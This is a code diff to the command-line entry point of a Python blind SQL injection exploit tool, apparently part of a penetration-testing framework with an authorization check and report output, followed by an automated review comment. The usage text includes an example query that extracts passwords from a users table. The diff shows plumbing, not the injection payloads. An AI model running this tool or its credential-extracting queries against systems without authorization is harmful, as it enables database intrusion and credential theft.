更新: 359 个文件 - 2026-03-16 23:30:01
@@ -33,6 +33,24 @@ import urllib.parse
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
from typing import Callable, Optional, List
|
||||
import sys
|
||||
from pathlib import Path
|
||||
import contextlib
|
||||
import io
|
||||
|
||||
|
||||
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
|
||||
if str(SCRIPTS_DIR) not in sys.path:
|
||||
sys.path.insert(0, str(SCRIPTS_DIR))
|
||||
|
||||
from tool_contract import ( # noqa: E402
|
||||
add_common_args,
|
||||
emit_report,
|
||||
ensure_authorized,
|
||||
make_report,
|
||||
parse_cookie_string,
|
||||
parse_headers,
|
||||
write_evidence,
|
||||
)
|
||||
|
||||
|
||||
class Colors:
|
||||
@@ -332,8 +350,10 @@ def main():
|
||||
)
|
||||
parser.add_argument("--true-indicator", help="布尔盲注真值指示器")
|
||||
parser.add_argument("-t", "--threads", type=int, default=1, help="线程数")
|
||||
add_common_args(parser)
|
||||
|
||||
args = parser.parse_args()
|
||||
ensure_authorized(args, parser)
|
||||
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
|
||||
@@ -344,12 +364,7 @@ def main():
|
||||
k, v = pair.split("=", 1)
|
||||
data[k] = v
|
||||
|
||||
cookies = {}
|
||||
if args.cookie:
|
||||
for pair in args.cookie.split(";"):
|
||||
if "=" in pair:
|
||||
k, v = pair.strip().split("=", 1)
|
||||
cookies[k] = v
|
||||
cookies = parse_cookie_string(args.cookie)
|
||||
|
||||
exploit = BlindSQLi(
|
||||
url=args.url,
|
||||
@@ -360,32 +375,81 @@ def main():
|
||||
delay=args.delay,
|
||||
threads=args.threads,
|
||||
)
|
||||
exploit.session.headers.update(parse_headers(args.header))
|
||||
if args.proxy:
|
||||
exploit.session.proxies.update({"http": args.proxy, "https": args.proxy})
|
||||
if args.format != "text":
|
||||
exploit._print = lambda *_args, **_kwargs: None # type: ignore[assignment]
|
||||
|
||||
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
|
||||
print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}")
|
||||
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
|
||||
result = None
|
||||
stdout_buffer = io.StringIO()
|
||||
capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
|
||||
|
||||
if args.query:
|
||||
result = exploit.extract_string(
|
||||
args.query, args.technique, args.dbms, true_indicator=args.true_indicator
|
||||
)
|
||||
print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}")
|
||||
with capture:
|
||||
if args.query:
|
||||
result = exploit.extract_string(
|
||||
args.query, args.technique, args.dbms, true_indicator=args.true_indicator
|
||||
)
|
||||
|
||||
elif args.extract:
|
||||
result = exploit.auto_extract(args.extract, args.dbms, args.technique)
|
||||
print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
|
||||
elif args.extract:
|
||||
result = exploit.auto_extract(args.extract, args.dbms, args.technique)
|
||||
|
||||
else:
|
||||
print(
|
||||
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}"
|
||||
)
|
||||
print(f"\n示例:")
|
||||
print(f" --extract user 提取当前用户")
|
||||
print(f" --extract database 提取当前数据库")
|
||||
print(f" --extract version 提取数据库版本")
|
||||
print(f' --query "SELECT password FROM users LIMIT 1"')
|
||||
if args.format == "text":
|
||||
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
|
||||
print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}")
|
||||
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
|
||||
if args.query:
|
||||
print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}")
|
||||
elif args.extract:
|
||||
print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
|
||||
else:
|
||||
print(
|
||||
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}"
|
||||
)
|
||||
print(f"\n示例:")
|
||||
print(f" --extract user 提取当前用户")
|
||||
print(f" --extract database 提取当前数据库")
|
||||
print(f" --extract version 提取数据库版本")
|
||||
print(f' --query "SELECT password FROM users LIMIT 1"')
|
||||
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
|
||||
|
||||
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
|
||||
evidence_refs = []
|
||||
ref = write_evidence(
|
||||
args,
|
||||
"blind-sqli-result.json",
|
||||
{
|
||||
"result": result,
|
||||
"captured_stdout": stdout_buffer.getvalue()[-1000:],
|
||||
"technique": args.technique,
|
||||
"dbms": args.dbms,
|
||||
},
|
||||
)
|
||||
if ref:
|
||||
evidence_refs.append(ref)
|
||||
status = "verified" if result else "needs-review"
|
||||
severity = "high" if result else "medium"
|
||||
report = make_report(
|
||||
tool="blind-sqli",
|
||||
mode=f"{args.technique}-blind-extraction",
|
||||
target=args.url,
|
||||
status=status,
|
||||
severity=severity,
|
||||
payload_or_probe={"query": args.query, "extract": args.extract, "result": result},
|
||||
request_summary={"param": args.param, "dbms": args.dbms, "threads": args.threads},
|
||||
evidence_refs=evidence_refs,
|
||||
destructive_risk="medium",
|
||||
args=args,
|
||||
)
|
||||
text_lines = [
|
||||
"=" * 60,
|
||||
"Blind SQL Injection Exploit Tool",
|
||||
"=" * 60,
|
||||
f"Target: {args.url}",
|
||||
f"Technique: {args.technique}",
|
||||
f"Result Present: {'yes' if result else 'no'}",
|
||||
f"Status: {status}",
|
||||
]
|
||||
emit_report(args, report, text_lines)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
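Review bot: The `captured_stdout` value written to the evidence file is only meaningful for non-text output, because `capture` falls back to `contextlib.nullcontext()` when `args.format == "text"`, and in the other formats `exploit._print` has already been replaced with a no-op on the line above, so most of the tool's own messages never reach `stdout_buffer` either. If the evidence is meant to record what the extraction printed, redirect unconditionally and replay the buffer afterwards, e.g. `capture = contextlib.redirect_stdout(stdout_buffer)` and, just before the text-mode banner, `sys.stdout.write(stdout_buffer.getvalue())`; the `_print` override can then be dropped. The buffer is also silently cut to its last 1000 characters, which deserves a comment such as `# keep only the tail so evidence files stay small`. Both `result` and the stdout tail are persisted to disk by `write_evidence`, and for a `--query` that reads credentials that is sensitive data, so it is worth confirming that the tool_contract evidence path is created with restrictive permissions (that helper is outside this hunk). `main()` begins before this hunk.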